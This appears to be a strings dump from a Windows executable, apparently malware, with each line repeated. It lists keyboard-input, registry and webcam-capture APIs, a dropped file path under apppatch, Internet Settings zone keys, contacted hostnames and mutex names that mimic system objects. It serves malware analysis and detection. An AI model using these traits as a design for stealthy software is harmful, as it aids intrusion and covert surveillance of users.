GetKeyboardLayout
GetKeyboardLayout
MapVirtualKeyW
MapVirtualKeyW
VkKeyScanW
VkKeyScanW
VkKeyScanExW
VkKeyScanExW
keybd_event
keybd_event
EnumChildWindows
EnumChildWindows
ActivateKeyboardLayout
ActivateKeyboardLayout
SetKeyboardState
SetKeyboardState
USER32.dll
USER32.dll
SetViewportOrgEx
SetViewportOrgEx
GetViewportOrgEx
GetViewportOrgEx
GDI32.dll
GDI32.dll
RegOpenKeyExA
RegOpenKeyExA
RegCloseKey
RegCloseKey
RegFlushKey
RegFlushKey
RegNotifyChangeKeyValue
RegNotifyChangeKeyValue
RegDeleteKeyA
RegDeleteKeyA
RegEnumKeyExA
RegEnumKeyExA
RegOpenKeyExW
RegOpenKeyExW
RegQueryInfoKeyW
RegQueryInfoKeyW
RegEnumKeyExW
RegEnumKeyExW
ADVAPI32.dll
ADVAPI32.dll
ole32.dll
ole32.dll
OLEAUT32.dll
OLEAUT32.dll
gdiplus.dll
gdiplus.dll
MSVCRT.dll
MSVCRT.dll
AVICAP32.dll
AVICAP32.dll
MSVFW32.dll
MSVFW32.dll
ShellExecuteW
ShellExecuteW
GetProcessHeap
GetProcessHeap
?456789:;
?456789:;
!"#$%&'()* ,-./0123
!"#$%&'()* ,-./0123
;3 #>6.&
;3 #>6.&
'2, / 0&7!4-)1#
'2, / 0&7!4-)1#
SYSTEM!XP10!F9BE9A8A
SYSTEM!XP10!F9BE9A8A
%WinDir%\apppatch\jsvlax.exe
%WinDir%\apppatch\jsvlax.exe
%Documents and Settings%\%current user%\Application Data\
%Documents and Settings%\%current user%\Application Data\
5`6C6Q6}6
5`6C6Q6}6
55
55
;";,;6;
;";,;6;
6&7-737
6&7-737
3"33393>3}3
3"33393>3}3
;#;);/;=;
;#;);/;=;
=}=
=}=
:(:-:8:=:
:(:-:8:=:
7#7)7/7=7
7#7)7/7=7
9&9,929@9
9&9,929@9
0!02090>0
0!02090>0
>$>*>4>9>
>$>*>4>9>
`.data
`.data
Windows Explorer
Windows Explorer
mavast.com
mavast.com
ya.ru
ya.ru
serverkey.dat
serverkey.dat
\windows\
\windows\
dntdll.dll
dntdll.dll
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET CLR Networking_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
.NET Data Provider for SqlServer_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
ASP.NET_2.0.50727_Perf_Library_Lock_PID_0
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
SOFTWARE\JavaSoft\Java Plug-in\1.6.0_%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\%d
Software\Microsoft\Windows\CurrentVersion\Internet Settings
Software\Microsoft\Windows\CurrentVersion\Internet Settings
iexplore.exe
iexplore.exe
HighMemoryEvent_x
HighMemoryEvent_x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.MAPPING.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.EVENT.x
MSCTF.Shared.MUTEX.x
MSCTF.Shared.MUTEX.x
.Prev
.Prev
.current
.current